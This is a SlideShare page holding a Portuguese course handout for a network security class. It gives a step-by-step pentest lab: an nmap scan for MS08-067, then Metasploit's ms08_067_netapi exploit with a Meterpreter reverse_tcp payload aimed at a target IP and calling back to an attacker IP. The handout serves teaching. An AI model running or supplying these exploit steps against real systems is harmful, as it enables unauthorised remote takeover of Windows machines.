Unidade6 roteiro pentest
Upcoming SlideShare
Loading in...5
×
 

Like this? Share it with your network

Share

Unidade6 roteiro pentest

on

  • 500 views

 

Statistics

Views

Total Views
500
Views on SlideShare
500
Embed Views
0

Actions

Likes
0
Downloads
9
Comments
0

0 Embeds 0

No embeds

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

Unidade6 roteiro pentest Document Transcript

  • 1. Curso Superior de Tecnologia em Redes de Computadores Segurança de Redes Prof. Leandro Almeida 1. Execute o nmap para verificar se o alvo é vulnerável (MS08-067) com o comando # nmap ­v –script=smb­check­vulns IP_DO_ALVO 2. Em caso positivo, inicie o pentest com o Metasploit, utilizando o comando: # msfconsole 3. Escolha o exploit que irá explorar a vulnerabilidade msf> use exploit/windows/smb/ms08_067_netapi 4. Informe o IP do alvo msf exploit(ms08_067) > set RHOST IP_DO_ALVO 5. Escolha o payload(carga do exploit)    msf exploit(ms08_067) > set PAYLOAD  windows/meterpreter/reverse_tcp 6. Informe o IP do atacante msf exploit(ms08_067) > set LHOST IP_DO_ATACANTE 7. Execute o ataque msf exploit(ms08_067) > exploit